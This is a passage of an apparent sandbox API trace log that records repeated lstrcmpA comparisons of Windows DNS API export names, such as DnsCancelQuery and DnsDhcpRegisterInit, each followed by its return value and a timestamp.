(lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0233.881] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0233.881] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0233.882] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0233.882] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0233.882] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0233.882] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterInit") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsCancelQuery") returned 1 [0234.884] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsCopyStringEx") returned 0 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="AddRefQueryBlobEx") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="BreakRecordsIntoBlob") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="CombineRecordsInBlob") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DeRefQueryBlobEx") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DelaySortDAServerlist") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAllocateRecord") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiAlloc") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiAllocZero") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiFree") returned 1 [0234.884] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiHeapReset") returned 1 [0234.885] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiRealloc") returned 1 [0234.885] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.885] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.885] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAsyncRegisterInit") returned 1 [0234.885] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsCancelQuery") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsCopyStringEx") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateReverseNameStringForIpAddress", lpString2="DnsCreateReverseNameStringForIpAddress") returned 0 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="AddRefQueryBlobEx") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="BreakRecordsIntoBlob") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="CombineRecordsInBlob") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DeRefQueryBlobEx") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DelaySortDAServerlist") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAllocateRecord") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiAlloc") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiAllocZero") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiFree") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiHeapReset") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiRealloc") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.886] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAsyncRegisterInit") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsCancelQuery") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsCopyStringEx") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStandardDnsNameCopy", lpString2="DnsCreateStandardDnsNameCopy") returned 0 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="AddRefQueryBlobEx") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="BreakRecordsIntoBlob") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="CombineRecordsInBlob") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DeRefQueryBlobEx") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DelaySortDAServerlist") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAllocateRecord") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiAlloc") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiAllocZero") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiFree") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiHeapReset") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiRealloc") returned 1 [0234.887] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAsyncRegisterInit") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsCancelQuery") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsCopyStringEx") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.888] lstrcmpA (lpString1="DnsCreateStringCopy", lpString2="DnsCreateStringCopy") returned 0 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="AddRefQueryBlobEx") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="BreakRecordsIntoBlob") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="CombineRecordsInBlob") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DeRefQueryBlobEx") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DelaySortDAServerlist") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAllocateRecord") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiAlloc") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiAllocZero") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiFree") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiHeapReset") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiRealloc") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.888] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAsyncRegisterInit") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsCancelQuery") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsCopyStringEx") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsCreateStringCopy") returned 1 [0234.889] lstrcmpA (lpString1="DnsDeRegisterLocal", lpString2="DnsDeRegisterLocal") returned 0 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="CombineRecordsInBlob") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DelaySortDAServerlist") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAllocateRecord") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiAlloc") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiAllocZero") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiFree") returned 1 [0234.889] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiHeapReset") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiRealloc") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAsyncRegisterInit") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsCancelQuery") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsCopyStringEx") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsCreateStringCopy") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsDeRegisterLocal") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterAddrs", lpString2="DnsDhcpRegisterAddrs") returned 0 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.890] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAsyncRegisterInit") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsCancelQuery") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsCopyStringEx") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsCreateStringCopy") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsDeRegisterLocal") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsDhcpRegisterAddrs") returned 1 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterHostAddrs", lpString2="DnsDhcpRegisterHostAddrs") returned 0 [0234.891] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.892] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.895] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0234.895] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiAlloc") returned 1 [0234.895] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0234.895] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiFree") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiRealloc") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAsyncRegisterInit") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsCancelQuery") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsCopyStringEx") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsCreateStringCopy") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsDeRegisterLocal") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsDhcpRegisterAddrs") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsDhcpRegisterHostAddrs") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterInit", lpString2="DnsDhcpRegisterInit") returned 0 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.896] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0234.897] lstrcmpA 